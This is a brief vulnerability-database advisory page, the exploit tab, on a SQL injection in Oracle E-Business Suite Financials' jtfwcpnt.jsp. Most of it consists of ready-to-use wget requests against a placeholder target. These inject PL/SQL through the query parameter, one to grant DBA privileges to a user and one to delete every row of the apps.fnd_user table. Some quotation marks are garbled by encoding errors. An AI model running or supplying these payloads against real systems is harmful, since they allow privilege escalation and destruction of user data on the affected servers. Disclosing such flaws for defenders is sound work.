• info
• discussion
• exploit
• solution
• references

Oracle E-Business Suite Financials 'jtfwcpnt.jsp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example requests are available:

$ export TARGET=�http://www.example.com:<port>/OA_HTML�
$ wget -O - â??$TARGET/OA.jspâ? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;â?
$ wget -O - â??$TARGET/OA.jspâ? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;â?